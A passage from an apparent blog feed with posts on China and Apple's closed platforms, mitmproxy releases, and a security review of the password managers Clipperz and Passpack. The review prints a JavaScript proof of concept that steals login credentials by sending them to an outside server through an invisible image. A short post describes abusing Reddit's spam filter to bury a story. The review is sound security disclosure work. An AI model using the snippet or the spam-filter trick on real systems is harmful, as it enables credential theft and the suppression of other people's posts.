When China started liberalising\nits markets, it seemed self-evident that the rise of capitalism in China would\nbring democracy in its wake. The Tiananmen Square protests in 1989 were supposed\nto be a sign of things to come, a precursor to wider revolution. The West's\nargument was persuasive - it was borne out by a century during which the world\nwas a roiling cauldron of political and economic experimentation, and nearly\nevery command economy had failed. Today, the international landscape has changed\nentirely. The West has had a catastrophic financial meltdown, and things are\nonly getting worse. There is a sense that the US-led Western order is in\ndecline, and the Chinese-led east is rising.  China has been the fastest growing\nmajor economy in the world for a decade, and the Communist Party is more firmly\nin control than ever. Today, there's no apparent prospect of political reform.\nChinese intellectuals and diplomats are beginning to mount an increasingly\nassertive and persuasive argument for a system of government that brings\nprosperity without liberty, and dictatorships the world over are listening very,\nvery carefully.<\/p>\n<p>In the software world, we've also spent decades arguing that freedom and\nprosperity go hand in hand. This is the <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Open_source_software#Open_source_software_vs._free_software\">\"Open\nSource\"<\/a>\njustification for free software: a pragmatic position that we should have\nliberty not for its own sake, but because it produces better outcomes. This is\nalso the argument behind open hardware platforms, behind open Internet\nstandards, behind interoperability. Some bloody battles had to be fought with\nmonopolists, but in the main the last 20 years have been a stunning success for\nopenness. 
There has always been a\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Richard_Stallman\">minority<\/a> who have made a more\nfundamental case for liberty, but it's important to recognize that they have\nlost the debate. The engine that drives the most important Open Source projects\nis entirely based on a superficial utilitarianism - the Googles and IBMs of the\nworld don't contribute to Open Source because they love liberty, but because the\nfinancial return they get from doing so is greater than their investment. The\nfundamental distinction between openness and free-ness hasn't been important so\nfar, though, because ideology and utilitarian arguments were aligned. Now,\nthings are changing.  No-one can deny that Apple's mobile device strategy has\nbeen a complete slam-dunk. The iPhone is the <a rel=\"external\" href=\"http:\/\/tech.fortune.cnn.com\/2010\/03\/02\/what-doth-it-profit-an-iphone\/\">most profitable handset out\nthere<\/a> by\nfar, and the iPad is shaping up to be huge. Apple's long-term plan is\nbreathtakingly ambitious - it's making a play for complete dominance in the\nmobile market, with an integrated offering that controls everything from content\nto applications to the devices themselves. It's therefore making a play for\ntotal control of the way most people will experience computation in the near\nfuture. Not even the most die-hard free-software hippie can deny that Apple's\nsuccess has been won on merit - their devices are simply, unmistakably better\nthan the competition.  Open platforms have been out-classed in almost every\nmeasurable dimension. So, we may be entering the next stage of the computer\nrevolution with devices where every native application has to be approved by a\nsingle authority, where even programming languages and development tools are\ncentrally controlled. 
Apple's competitors and imitators are watching and taking\nnotes, because far from being punished by the market for this, they have\nprofited beyond the wildest dreams of avarice.<\/p>\n<p>Apple and China have put pragmatists who also value freedom in a quandary. In\nthe past, practice and ideology aligned neatly: political liberty and economic\nprogress went hand in hand, and so did open platforms and commercial success.\nThere are now powerful counter-examples to this line of thinking, and it seems\nclear that making a pragmatic argument for liberty has been a strategic\nmis-step both in politics and in technology. Advocates of freedom will have to\nturn back to more fundamental arguments: human rights, ethics and morality.  We\nshould recognize that at this point in time, we're losing the war of ideas. I\nmust admit, in my darker moments I'm pessimistic about our ability to make the\ncase persuasively to a disengaged public.<\/p>\n<p><strong>PS<\/strong><\/p>\n<p>To keep this post manageable, I've not talked about factors that muddy the\nwaters for the technical side of the argument. For instance, I don't think\nMicrosoft is a counter-example, and neither is Apple's support for open web\nstandards. I'll save those for a future post. 
I'd also like to point out that\nI'm absolutely not anti-Apple - I own a lot of Apple gear that I use every day.\nMy position regarding China's place in the world is a caricature of <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Stefan_Halper\">Stefan\nHalper<\/a>'s superb book <a rel=\"external\" href=\"http:\/\/www.amazon.com\/Beijing-Consensus-Authoritarian-Dominate-Twenty-First\/dp\/0465013619\/\">\"The Beijing\nConsensus: How China's authoritarian model will dominate the twenty-first\ncentury\"<\/a>.\nYou can listen to him speaking about this book at the Cato Institute <a rel=\"external\" href=\"http:\/\/www.cato.org\/event.php?eventid=6990\">over\nhere<\/a>.<\/p>\n"},{"title":"Sortvis updates","published":"2010-04-01T00:00:00+00:00","updated":"2010-04-01T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/sortvis-update\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/sortvis-update\/","content":"<div class=\"media\">\n    <a href=\"oddevensort.png\">\n        <img src=\"oddevensort.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>There have been some improvements to <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis<\/a> - my\nsorting algorithm visualisation project - in the last few months. Graphs are now\nmore balanced, with an equal lead-in and lead-off at the edges. There has also\nbeen a swathe of algorithm contributions - thanks to Aaron Gallagher and Chris\nWong (the image above is of <a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Odd-even_sort\">Odd-even\nSort<\/a>, contributed by Aaron). As\nusual, you can find the code for all of this on\n<a rel=\"external\" href=\"http:\/\/github.com\/cortesi\/sortvis\">github<\/a>. 
I've updated the visualisation page\non my blog with new graphs for all algorithms - go take a look\n<a rel=\"external\" href=\"http:\/\/sortvis.org\">here<\/a>.<\/p>\n<p>I plan to move sortvis and the collection of visualisations onto their own\ndomain soon. I'm also thinking about making large wall-posters of the\nvisualisations available. I plan to make some prints for myself, and I'm\nassuming that I'm not the only one geeky enough to want a sorting algorithm on\nmy wall. Would anyone be interested?<\/p>\n"},{"title":"mitmproxy 0.2","published":"2010-03-01T00:00:00+00:00","updated":"2010-03-01T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/software\/mitmproxy0_2\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/software\/mitmproxy0_2\/","content":"<p>Just released <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy 0.2<\/a>. Changes include:<\/p>\n<ul>\n<li>Big speed and responsiveness improvements, thanks to Thomas Roth<\/li>\n<li>Support urwid 0.9.9<\/li>\n<li>Terminal beeping based on filter expressions<\/li>\n<li>Filter expressions for terminal beeps, limits, interceptions and sticky\ncookies can now be passed on the command line.<\/li>\n<li>Save requests and responses to file<\/li>\n<li>Split off non-interactive dump functionality into a new tool called\nmitmdump<\/li>\n<li>\"A\" will now accept all intercepted connections<\/li>\n<li>Lots of bugfixes<\/li>\n<\/ul>\n"},{"title":"How to stop a story from appearing on Reddit","published":"2010-02-28T00:00:00+00:00","updated":"2010-02-28T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/socialmedia\/reddit-story-dos\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/socialmedia\/reddit-story-dos\/","content":"<div class=\"media\">\n    <a href=\"reddit-story-dos.jpg\">\n        <img src=\"reddit-story-dos.jpg\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Mallory hates Bob. 
Bob has a blog about ponies, and Mallory knows that a\nlarge-ish fraction of Bob's traffic comes from the <a rel=\"external\" href=\"http:\/\/www.reddit.com\/r\/ponies\">ponies\nSubreddit<\/a>. If Bob's stories stopped appearing\nthere it would make him sad, and Mallory, the venomous little sadist that he\nis, would rejoice. Here's how Mallory could accomplish the deed:<\/p>\n<ul>\n<li>Watch Bob's blog closely to make sure he's the first to submit Bob's\nposts to Reddit.<\/li>\n<li>Include some words that will trigger the spam-filter in the submission\ntitle. Any combination of \"viagra\" and \"cialis\" will do just fine.<\/li>\n<li>Sit back and cackle evilly.<\/li>\n<\/ul>\n<p>Now Bob's post is sitting in the spam queue on the ponies Subreddit. Since the\npost has already been submitted, the nice users who usually submit Bob's story\ncan't re-submit it to the same Subreddit. Maybe someone will notice and alert a\nmoderator, but by the time they un-ban the story nobody cares because it's\nalready 10 hours old and on page 50 of the \/new queue. Bob thinks nobody loves\nhim, and retires to live out the remainder of his years, sad and lonely, in a\nsmall, unheated hut on a hill outside of town.<\/p>\n<p>In this story, I am Bob, Mallory is some innocent schmuck who submitted my\n<a href=\"https:\/\/corte.si\/posts\/security\/hostproof\/\">last post<\/a> to the programming Subreddit\nwhile they were silently banned (how were they to know, right?), and the small,\nunheated hut is the Aeron chair in front of my desk. 
The blog about ponies,\nhowever, is entirely fictional.<\/p>\n"},{"title":"Host-proof applications: doing it wrong","published":"2010-02-26T00:00:00+00:00","updated":"2010-02-26T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/hostproof\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/hostproof\/","content":"<p><b>Please note that the criticism of Clipperz in this post is now out of date -\nthe Clipperz team is clearly very security-focused, and responded quickly to\naddress the concerns raised below. <\/b><\/p>\n<p>Every day I push another bit of my life into the cloud. There was a time when\nall my personal data lived on one or two drives I could actually see, touch, and\nsniff. Now, I don't even run a personal backup anymore - my software is on\nGithub, my emails are with Google and the rest of my personal data is spread\nevenly between Facebook, Twitter and a handful of online productivity tools. I\ndo keep redundant checkouts of the important stuff, but that's really just a\nside-effect of needing to be able to work off-line. The truth is, my house and\nall my gear could sink into the swamp tomorrow, and as long as I have a web\nbrowser and git I'd be back to work the same day. How wonderful...<\/p>\n<p>... but, then again. I think like a devious, malicious cad <a rel=\"external\" href=\"http:\/\/www.nullcube.com\">for a\nliving<\/a>, and where one part of me sees convenience,\nanother sees spooks, privacy violations and unscrupulous monetisation\nopportunities. I can't help but feel we got shafted. We were promised a glorious\ndecentralised future where everyone would be in control of their own data, and\ninstead our lives have been sliced up and warehoused in a small handful of\nall-powerful, opaque silos. 
The companies running these things all say the same\nthing - \"Trust us!\" - but as data leak follows data leak and privacy violation\nfollows privacy violation, there has to come a time when users decide that\npromises aren't good enough.<\/p>\n<h2 id=\"host-proof-applications\">Host-proof applications<\/h2>\n<p>It turns out that the first tentative steps towards a better way of doing things\nhave already been taken. The broad goal is simple: to design web applications in\nsuch a way that we don't <em>have<\/em> to trust the host. Javascript interpreters are\nfast enough nowadays to do real-world crypto at reasonable speeds, so we can\nencrypt and decrypt data on the client side and store only encrypted data on the\nserver. The server never sees our encryption keys, and if the implementation is\nsecure, couldn't access our data even if it tried.<\/p>\n<p>Two groups of people have pioneered this application development style, under\ntwo different names. As far as I can tell, the idea was first articulated in\n2005 by <a rel=\"external\" href=\"http:\/\/smokey.rhs.com\/web\/blog\/PowerOfTheSchwartz.nsf\/d6plinks\/RSCZ-6C5G54\">Richard\nSchwartz<\/a>,\nand fleshed out on the ajaxpatterns.org wiki under the name <a rel=\"external\" href=\"http:\/\/ajaxpatterns.org\/Host-Proof_Hosting\">host-proof\nhosting<\/a>.  Shortly after that,\n<a rel=\"external\" href=\"http:\/\/clipperz.com\">Clipperz<\/a> floated as the first real-world, commercial\nimplementation of essentially the same idea, but its founders described what\nthey were building as a <a rel=\"external\" href=\"http:\/\/www.clipperz.com\/users\/marco\/blog\/2007\/08\/24\/anatomy_zero_knowledge_web_application\">zero knowledge web\napplication.<\/a>\nReading these manifestos carefully, it seems clear that although their emphases\nare different, their core aims and principles are identical. It's also pretty\nclear that both terms are misnomers. 
\"Zero-knowledge\" has a specific\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/Zero-knowledge_proof\">cryptographic meaning<\/a>\nthat's only peripherally relevant to the broad application design pattern.\nWhat's more, the term is misleading to the layperson, since there's no such\nthing as a \"zero-knowledge\" application, in any real sense. The server\nunavoidably knows quite a lot about the client - the address they're connecting\nfrom, how frequently they connect, what operations they're executing, what\nbrowser they're using, and so on. \"Host-proof hosting\", on the other hand,\nassigns the \"host-proof\" attribute to the wrong end of the pipe. A more accurate\nterm would be <strong>host-proof application<\/strong>, and that's how I'm going to refer to\nthese ideas in the rest of this post.<\/p>\n<p>The pot of gold at the end of this rainbow is to combine the benefits of the\ncloud with strong, host-independent data security guarantees. The possibilities\nare incredibly enticing. I can imagine a cryptographic Facebook where you don't\nneed to trust the host to aggregate the entire world's private data in the\nclear. I can imagine storing medical records and financial data in the cloud\nwhile still allowing people to maintain direct control over who uses the data\nand how. I can imagine a Gmail where everyone uses crypto by default, where\ndecryption and encryption happens right in the browser. Yes, the technical\nobstacles that stand in the way of these dreams are immense, but if we can\nsurmount them a better world lies beyond.<\/p>\n<h2 id=\"two-steps-to-shangri-la\">Two steps to Shangri-la<\/h2>\n<p>Before we look at some real-world applications, I'd like to briefly talk about\ntwo essential elements of a secure host-proof application: client-side security\nand verification. 
Let's take each of these in turn.<\/p>\n<h3 id=\"1-client-side-security\">1: Client-side security<\/h3>\n<p>Host-proof applications turn the traditional web security model on its head.\nInstead of trying to secure the server from the browser, we have to secure the\nbrowser-side application from the server. In fact, we fundamentally <em>don't\ncare<\/em> about the server side of the equation - the client-side code should be\nsecure no matter what combination of malicious skulduggery happens upstream.\nYes, this does mean that a host-proof app's security hinges on the security of\nthe browser scripting environment, which is undoubtedly one of the most\nsecurity-hostile spaces ever devised by the mind of man. Many sensible people\nwould call it quits right there, but I think we can do a decent job of\nclient-side security with careful thought.<\/p>\n<h3 id=\"2-verification\">2: Verification<\/h3>\n<p>Once we have a secure client-side application, we need to make the tools and\ninformation available to allow users to actually verify that the code running\nin their browser is secure. This immediately implies that the client-side of\nthe application has to be published somewhere independent for peer review.\nPerhaps surprisingly, we can also conclude that publishing the server code of a\nhost-proof application is a distraction. Spending time verifying the security\nof the server code is a waste of effort, since we must always assume that the\nserver has already been compromised, and is actively malicious.<\/p>\n<p>The next step in the verification process is harder. Every time the user visits\na host-proof application, they are getting a blob of potentially malicious data\nfrom the server. It's vital that there be some mechanism that allows the user\nto check that the code running in their browser matches the code published for\npeer review. 
One obvious but cumbersome way to do that is to make sure that\nyour entire application is a single, rolled-up blob, and then to simply publish\na checksum.  Although it's a pain in the ass to do, in theory users can\ndownload and verify the application's integrity. In reality, the vast majority\nof users won't ever bother to use a verification system this cumbersome, and even\nthose that do won't do so every time. That's not a good reason to give up,\nthough - making this process workable for users is critical if the host-proof\nparadigm is to be viable.<\/p>\n<h2 id=\"how-to-penetration-test-a-host-proof-application\">How to penetration test a host-proof application<\/h2>\n<p>Two characteristic \"game-over\" scenarios follow immediately from these security\nelements. First, we could subvert the verification process to fool the user\ninto using a corrupted application. Second, we could exploit a security hole in\nthe client-side application to execute arbitrary code in the browser. If we can\ndo either of these things, a malicious entity in control of the server could\naccess a user's private data and have their merry way with it. Which would be\nbad. In both these scenarios the server is the attacker - so, where a\ntraditional web app penetration test often revolves around malicious data sent\nby the browser to the server, a host-proof app penetration test focuses on\nmalicious responses from the server to the browser. Of course, there are a\nmyriad of other ways in which the security of a host-proof app can fail - but\nverification and client-side security are the first two hurdles to cross.<\/p>\n<p>At this point, you might be thinking that a tool that lets you tamper with\nserver responses before they hit the browser would be damn handy. 
Tools like\n<a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/966\">TamperData<\/a> let you modify\noutbound requests, but it turns out that extending them to do the same with\ninbound data is non-trivial. Not entirely coincidentally, though, I recently\nreleased a little tool called <a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a> that does\nthe job just fine. It's an interactive, SSL-capable proxy with a curses\ninterface that sits between your browser and the server, letting you intercept\nand modify requests and responses on the fly.<\/p>\n<p>Let's take mitmproxy for a spin to look at some of the contenders in the\nhost-proof application space.<\/p>\n<h2 id=\"clipperz-facepalm\">Clipperz: facepalm<\/h2>\n<p>First in line is <a rel=\"external\" href=\"http:\/\/www.clipperz.com\">Clipperz<\/a>, a project I've been\nfollowing for a number of years.  The founders - Marco Barulli and Giulio\nCesare Solaroli - were early pioneers of the host-proof application paradigm,\nand as far as I know, were the first to try to make a livelihood by\ncommercialising the idea. To get a flavour for what they're about, I highly\nrecommend <a rel=\"external\" href=\"http:\/\/itc.conversationsnetwork.org\/shows\/detail4283.html\">this\ninterview<\/a> that Jon\nUdell did with Barulli.<\/p>\n<p>Now, let's review the claims that Clipperz makes for itself. Its\n<a rel=\"external\" href=\"http:\/\/www.clipperz.com\/about\">about<\/a> page says:<\/p>\n<blockquote>\n<p>We got used to trust online services with our data (photos, text documents,\nspreadsheets, ...) 
but Clipperz proves that this is not necessary: users can\nenjoy a web based application without the need to trust the web application\nprovider.<\/p>\n<\/blockquote>\n<p>The <a rel=\"external\" href=\"http:\/\/www.clipperz.com\/support\/user_guide\">user guide<\/a> expands on this:<\/p>\n<blockquote>\n<p>Clipperz simply hosts your encrypted cards and provide you with a nice\ninterface to manage your data, but it could never access the cards in their\nplain form.<\/p>\n<\/blockquote>\n<p>Well, righty oh! That's a very forthright guarantee. Let's see if Clipperz lives\nup to it.<\/p>\n<h3 id=\"1-verification\">1: Verification<\/h3>\n<p>Clipperz takes verification seriously. The entire Clipperz source is\nprominently published for review. They also seem to have architected their\napplication specifically to make checksum verification possible - the\nclient-side comes down the wire as a single blob, with no external\ndependencies. This means that verification really can be as simple as taking a\nchecksum over the application page. They even have <a rel=\"external\" href=\"http:\/\/www.clipperz.com\/reviewing_the_code\/checksums\">instructions that show how\nto do this using wget<\/a>.<\/p>\n<p>There are two important criticisms of the Clipperz verification process. Most\ncritically, they publish the checksums and verification package right on the\nClipperz homepage. If we assume that the server has been compromised, the\nattacker is in control of both the checksums and the app, and we're up the\ncreek. Secondly, although Clipperz has gone to a lot of effort to make the\nprocess easy, verification is still too cumbersome. The vast majority of their\nusers will never bother to verify their client-side at all. 
Some more\ninnovation is needed from an already very innovative company to make this\nprocess simpler.<\/p>\n<p>All told, though, this is a good effort - with a little bit of extra work,\nClipperz would get a definite \"pass\" for verification.<\/p>\n<h3 id=\"2-client-side-security\">2: Client-side security<\/h3>\n<p>Client-side security is a different story. The moment we look at the traffic\nbetween the client and server, it's immediately clear that something is very,\nvery wrong.  Here's a sample of what comes down the pipe to the client:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">throw<\/span><span style=\"color: #032F62;\"> &#39;allowScriptTagRemoting is false.&#39;<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">\/\/#DWR-INSERT<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6A737D;\">\/\/#DWR-REPLY<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">var<\/span><span> s0<\/span><span style=\"color: #D73A49;\">=<\/span><span>{};<\/span><span style=\"color: #D73A49;\">var<\/span><span> s1<\/span><span style=\"color: #D73A49;\">=<\/span><span>{};s0.result<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;done&quot;<\/span><span>;s0.lock<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;4EB1C567-7FFE-928D-E0C8-11AF8870DE57&quot;<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span>s1.requestType<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;MESSAGE&quot;<\/span><span>;s1.targetValue<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #032F62;\">&quot;blahblah&quot;<\/span><span>;s1.cost<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">2<\/span><span>;<\/span><\/span>\n<span 
class=\"giallo-l\"><span>dwr.engine.<\/span><span style=\"color: #6F42C1;\">_remoteHandleCallback<\/span><span>(<\/span><span style=\"color: #032F62;\">&#39;5&#39;<\/span><span>,<\/span><span style=\"color: #032F62;\">&#39;0&#39;<\/span><span>,{result:s0,toll:s1});<\/span><\/span><\/code><\/pre>\n<p>Don't let the <strong>throw<\/strong> at the top of the snippet fool you. That gets stripped\noff by the client-side code, and the remainder of the snippet is then run by\nthe client-side application. Yes, folks: Clipperz uses\n<a rel=\"external\" href=\"http:\/\/directwebremoting.org\/dwr\/index.html\">DWR<\/a>, which means that the\nClipperz server sends little chunks of Javascript back to the browser, which\nare then eval-ed in the password manager's context. This means that the\napplication is <em>designed<\/em> to let the supposedly untrusted server execute\narbitrary code in the secure environment that contains your S00P3R S3KR3T data.\nSo all their work to make their application verifiable and all the effort\nexpended to publish their code for review is worth exactly bupkis.<\/p>\n<p>Facepalm.<\/p>\n<p>To prove that this isn't an academic issue, here's a trivial exploit showing\nhow someone in control of the Clipperz server could access a user's private\ndata even if they went to the effort of verifying the application checksum.\n<strong>WARNING:<\/strong> Doing this using your real Clipperz credentials will make your\nusername and password appear in my webserver logs! If you're following along\nwith mitmproxy, you need to set an intercept on responses from Clipperz (\"i\"\nfor intercept, and use the pattern \"~s ~u clipperz\"). 
And then add the\nfollowing lines of code to the first server response after you click the\n\"login\" button, just below the \"#DWR-REPLY\" marker:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"javascript\"><span class=\"giallo-l\"><span style=\"color: #D73A49;\">var<\/span><span> f<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #6F42C1;\"> getElementsByTagAndClassName<\/span><span>(<\/span><span style=\"color: #032F62;\">&quot;input&quot;<\/span><span>,<\/span><span style=\"color: #032F62;\"> &quot;loginFormField&quot;<\/span><span>);<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">var<\/span><span> s<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #032F62;\"> &quot;http:\/\/corte.si\/sploit\/&quot;<\/span><span>;<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">for<\/span><span> (<\/span><span style=\"color: #D73A49;\">var<\/span><span> i<\/span><span style=\"color: #D73A49;\">=<\/span><span style=\"color: #005CC5;\">0<\/span><span>; i<\/span><span style=\"color: #D73A49;\"> &lt;<\/span><span> f.<\/span><span style=\"color: #005CC5;\">length<\/span><span>; i<\/span><span style=\"color: #D73A49;\">++<\/span><span>){s<\/span><span style=\"color: #D73A49;\"> =<\/span><span> s<\/span><span style=\"color: #D73A49;\"> +<\/span><span> f[i].value<\/span><span style=\"color: #D73A49;\"> +<\/span><span style=\"color: #032F62;\"> &quot;::&quot;<\/span><span>;}<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #D73A49;\">var<\/span><span> e<\/span><span style=\"color: #D73A49;\"> =<\/span><span style=\"color: #6F42C1;\"> IMG<\/span><span>({<\/span><span style=\"color: #032F62;\">&quot;src&quot;<\/span><span>: s,<\/span><span style=\"color: #032F62;\"> &quot;height&quot;<\/span><span>:<\/span><span style=\"color: #032F62;\"> &quot;0px&quot;<\/span><span>,<\/span><span style=\"color: #032F62;\"> 
&quot;width&quot;<\/span><span>:<\/span><span style=\"color: #032F62;\"> &quot;0px&quot;<\/span><span>});<\/span><\/span>\n<span class=\"giallo-l\"><span style=\"color: #6F42C1;\">appendChildNodes<\/span><span>(<\/span><span style=\"color: #6F42C1;\">$<\/span><span>(<\/span><span style=\"color: #032F62;\">&quot;header&quot;<\/span><span>), e);<\/span><\/span><\/code><\/pre>\n<p>This rough and ready snippet simply adds an invisible image tag to the page,\nwhich loads a bogus image that includes the username and password in the source\npath. Image sources aren't constrained by the same origin policy, so we can\nsend this data wherever we like - in this case, the server my blog is hosted\non. The login process will continue as usual, and unless the user is watching\ntheir network traffic carefully, they'll be none the wiser.<\/p>\n<h2 id=\"don-t-worry-clipperz-passpack-does-it-wrong-too\">Don't worry Clipperz, Passpack does it wrong too<\/h2>\n<p>The other big contender in the host-proof application space is Clipperz'\nslicker-looking rival, <a rel=\"external\" href=\"http:\/\/www.passpack.com\">Passpack<\/a>. A glance at their\nsecurity page shows that they definitely refer to themselves as applying the\n\"host-proof hosting\" pattern. Their <a rel=\"external\" href=\"https:\/\/www.passpack.com\/en\/faq\/\">FAQ<\/a>\nmakes the typical strong security claim:<\/p>\n<blockquote>\n<p><strong>Can Passpack read my passwords?<\/strong><\/p>\n<p>Not even if we wanted to. It's not possible.<\/p>\n<\/blockquote>\n<p>Not possible, eh? Well, let's see.<\/p>\n<h3 id=\"1-verification-1\">1: Verification<\/h3>\n<p>Passpack has completely punted on the verification issue. They don't publish\nany checksums, they don't publish their source, and their application is split\nup into innumerable components that would make verification a nightmare. 
In a\nblog post <a rel=\"external\" href=\"http:\/\/blog.passpack.com\/2007\/04\/passpack-and-clipperz-the-difference\">comparing themselves with\nClipperz<\/a>,\nthey make clear that this is a conscious choice on their part, not an\noversight. In fact, they level the same criticism at the Clipperz verification\nprocess that I do. Clipperz publishes their verification package right on their\nhomepage:<\/p>\n<blockquote>\n<p>However, if I am in a phished version of Clipperz, it's a moot point because\nthe phisherman can falsify those values as well so that they match his\nspoofed version.<\/p>\n<\/blockquote>\n<p>This misses the point of the checksum somewhat - we're not trying to protect\nagainst phishing, but against a malicious server - but the criticism is valid\nnone the less. Passpack is also right that the Clipperz checksum verification\nprocess is too cumbersome:<\/p>\n<blockquote>\n<p>I just don't think anyone would really do that - always, every single time,\nmany times a day.<\/p>\n<\/blockquote>\n<p>Quite so. But instead of trying to compete with Clipperz by doing a better job on\nthese points, Passpack gave up - they only publish a checksum for the offline\nversion of their application. This is a disastrous decision. Passpack users are\ncompelled to execute whatever the server passes them, without any verification\nor review.  If this was a sudden-death match, that would be Passpack pretty\nmuch done right there.<\/p>\n<h3 id=\"2-client-side-security-1\">2: Client-side security<\/h3>\n<p>But even if they <em>did<\/em> have a verification mechanism, it still wouldn't help.\nFiring up mitmproxy, our first look at the traffic seems promising. During the\nlogin process we see JSON snippets - which can be deserialized safely - being\npassed to and fro, rather than chunks of Javascript. Then we notice that the\nnews pane comes through as a chunk of HTML.  When we edit the response to add a\n&lt;script&gt; tag, it gets executed.  
Furthermore, when we click on any of the\nmenu buttons, gobs of Javascript are pumped into the client app and merrily\nevaluated. I stopped looking at the application at this point. There's no point\nshowing an example of how someone in control of the server could exploit this\nsituation, because it's clear that preventing script injection is simply not a\ndesign goal of the Passpack project. So, that's 0 for 2 for Passpack.<\/p>\n<h2 id=\"the-emperor-sure-looks-naked-to-me\">The emperor sure looks naked to me<\/h2>\n<p>I want to make it clear that I wish both these projects well. Their founders\nhave thrown their hats into the ring, and had the stones to try to make the\nhost-proof application paradigm work in a commercial setting. Both projects have\npublished significant libraries for building host-proof apps (see the <a rel=\"external\" href=\"http:\/\/www.clipperz.com\/open_source\/javascript_crypto_library\">Clipperz\nJavascript Crypto\nLibrary<\/a>, and the\n<a rel=\"external\" href=\"http:\/\/www.passpack.com\/en\/credits\/\">Passpack Host-Proof Hosting Library<\/a>) that\nwill undoubtedly make the road easier for those who follow in their footsteps.\nIt's in the interest of all freedom-loving citizens of the Internet that both\nthese companies prosper, because we need more host-proof applications, not\nfewer. However...<\/p>\n<p>Without a client-side that is both secure <strong>and<\/strong> verified in the sense I\ndescribe above, an application simply isn't \"host-proof\" in any meaningful\nsense. If your application is designed in such a way that you can simply\n<strong>ask<\/strong> your user's browser for their private data, you can't say \"we couldn't\naccess your data even if we wanted to\", and you can't say \"we've designed our\nsystem so that you don't have to trust us\". 
Now, I can anticipate some of the\nresponse to this statement - people will say that checksum verification isn't\npractical, that users wouldn't bother, that an application that sticks\nrigorously to the host-proof application principles would be unusable.  This\nmight all be true - but is beside the point. The truth is, if someone hacked\nthe Clipperz or Passpack servers, they <strong>could<\/strong> steal bank details or server\npasswords or whatever else people keep in their lockers - so we're relying on\nthe hosts to be secure. And like Google and Facebook, Clipperz and Passpack\n<strong>could<\/strong> access their users' private data - they're just promising that they\nwon't. Just like everybody else, really.<\/p>\n<p>Luckily, the steps required to fix things are clear. Clipperz made a critical\nmistake in choosing DWR for their client-server communications, but that can be\nrectified. Passpack needs to abandon its misguided idea that no verification of\nthe client-side application is needed, and do the work to make this possible.\nPasspack already uses JSON for most of its communication - if they used it\nconsistently for all server communication, their client-side app could be on\nsolid ground. Both projects need to put on their thinking caps, and come up\nwith a better way to approach the client-side verification problem. I'm hopeful\nthat we'll see improvements from both projects in response to this post.<\/p>\n<h2 id=\"up-next-building-a-minimal-host-proof-application\">Up next: building a minimal host-proof application<\/h2>\n<p>All of this started off the exhaustingly monomaniacal hamster-on-a-wheel that I\nhave where other people have a brain. I found myself awake at 3am, thinking\nabout host-proof apps, and pondering the ineluctable modalities of the\nverification problem. So, I decided to spend some time building a minimal\nuseful host-proof application to experiment with. 
Tune in next week for my next\nthrilling post, where I build and launch a tiny, experimental and unashamedly\nuser-hostile host-proof app.<\/p>\n"},{"title":"Introducing mitmproxy: an interactive man-in-the-middle proxy","published":"2010-02-16T00:00:00+00:00","updated":"2010-02-16T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_1\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/mitmproxy\/announce0_1\/","content":"<h1> Update: see <a href=\"http:\/\/mitmproxy.org\">mitmproxy.org<\/a> for recent releases!<\/h1>\n<p>I spend a lot of time poking at web interfaces, both for penetration testing\nand generally while developing software. This usually involves iteratively\nmaking small modifications to requests, and running them again and again until\nI find a vulnerability or reproduce a bug. Using a browser plugin like\n<a rel=\"external\" href=\"https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/966\">tamperdata<\/a> is great for a\nquick first stab at things, but gets clunky quickly.  Scripting things up is\nusually the next step, and that's fine, but time-consuming and not very agile.<\/p>\n<div class=\"media\">\n    <a href=\"mitmproxy-screenshot.png\">\n        <img src=\"mitmproxy-screenshot.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>So, I'm releasing <strong>mitmproxy<\/strong> - an interactive, SSL-aware man-in-the-middle\nproxy that lets you view, modify and replay HTTP connections. It's aimed at\nsoftware developers and penetration testers (i.e. people like me), who need to\nintensively tamper with and monitor HTTP traffic. Using it, you can point your\nbrowser at a page that loads a bazillion images and 50 snippets of JSON, pick\nout the one 